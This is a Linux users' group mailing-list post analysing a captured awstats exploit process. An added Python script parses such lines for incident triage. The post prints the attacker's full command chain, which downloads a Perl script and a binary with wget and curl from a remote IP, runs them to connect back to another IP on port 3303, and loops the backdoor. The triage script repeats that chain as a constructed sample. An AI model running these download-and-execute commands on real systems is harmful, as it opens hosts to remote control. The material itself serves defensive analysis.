Obviously, if awstats is properly configured/patched then it will not
run this process:

6087 ?        R     81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping
.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.10
5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105
.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http:
//219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wg
et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o pin
g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%
00/awstats.w.x.y.z.conf

and using a bit of common sense, you'll know that it had put in
something on your box which is particularly malicious.  Let's try to
trim this down (since I have lots of time on my hands)

- smells like a spawned sh shell.

wget http://219.84.105.36/ping.txt
mv ping.txt temp2006
perl temp2006 220.227.100.4 3303 : (smells like a backdoor)

(oops this was unsuccessful, kiddie tries again using curl)
cd /tmp/
curl -o temp2006  http://219.84.105.36/ping.txt
perl temp2006 220.227.100.4 3303;done;wg

(oops! this was unsuccessful too! 3 is a charm! this time comes
precompiled *Grin*)

wget http://219.84.105.36/ping
chmod +x ping;
./ping 220.227.100.4 3303

and so on and so forth.. ;)

;)
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
[email protected] (#PLUG @ irc.free.net.ph)
Read the Guidelines: http://linux.org.ph/lists
Searchable Archives: http://archives.free.net.ph
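
The manual breakdown in the message above, automated for triage, as an added example that is not part of the original post: it splits the `sh -c` argument of a `ps` line into commands and reports every file that was downloaded and then executed. The sample line is constructed (documentation-range addresses in place of real hosts), and `split_commands` and `triage` are hypothetical names.

```python
import shlex

# Constructed sample shaped like the ps line in the post (documentation IPs).
SAMPLE_PS = (
    "6087 ?  R  81:06 sh -c echo ;echo b_exp;"
    "wget http://192.0.2.10/ping.txt;mv ping.txt temp2006;"
    "perl temp2006 198.51.100.7 3303;cd /tmp/;"
    "curl -o temp2006 http://192.0.2.10/ping.txt;"
    "while [ 1 ];do perl temp2006 198.51.100.7 3303;done;"
    "curl -o ping http://192.0.2.10/ping;chmod +x ping;"
    "./ping 198.51.100.7 3303;echo e_exp;%00/awstats.w.x.y.z.conf"
)
OUT_FLAG = {"wget": "-O", "curl": "-o"}   # option naming the saved file
INTERPRETERS = {"perl", "sh", "bash", "python"}

def split_commands(ps_line):
    """Return the ';'-separated commands handed to `sh -c` in a ps line."""
    _, _, script = ps_line.partition("sh -c ")
    return [c.strip() for c in script.split(";") if c.strip()]

def triage(ps_line):
    """List (file, source_url, args) for files fetched and then executed."""
    fetched, findings = {}, []            # fetched: local name -> URL
    for cmd in split_commands(ps_line):
        try:
            argv = shlex.split(cmd)
        except ValueError:                # unbalanced quotes: skip fragment
            continue
        if argv and argv[0] == "do":      # body of a `while ...;do` loop
            argv = argv[1:]
        if not argv:
            continue
        prog = argv[0]
        if prog in OUT_FLAG:
            url = next((a for a in argv if a.startswith(("http://", "https://"))), None)
            if url is None:
                continue
            name = url.rsplit("/", 1)[-1]  # default: last URL path segment
            if OUT_FLAG[prog] in argv[:-1]:
                name = argv[argv.index(OUT_FLAG[prog]) + 1]
            fetched[name] = url
        elif prog == "mv" and len(argv) == 3 and argv[1] in fetched:
            fetched[argv[2]] = fetched.pop(argv[1])   # follow the rename
        elif prog in INTERPRETERS and len(argv) > 1 and argv[1] in fetched:
            findings.append((argv[1], fetched[argv[1]], argv[2:]))
        elif prog.startswith("./") and prog[2:] in fetched:
            findings.append((prog[2:], fetched[prog[2:]], argv[1:]))
    return findings
```

Each finding pairs the executed file with the URL it came from and the arguments it was run with, which are the values to look for in outbound firewall and proxy logs.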
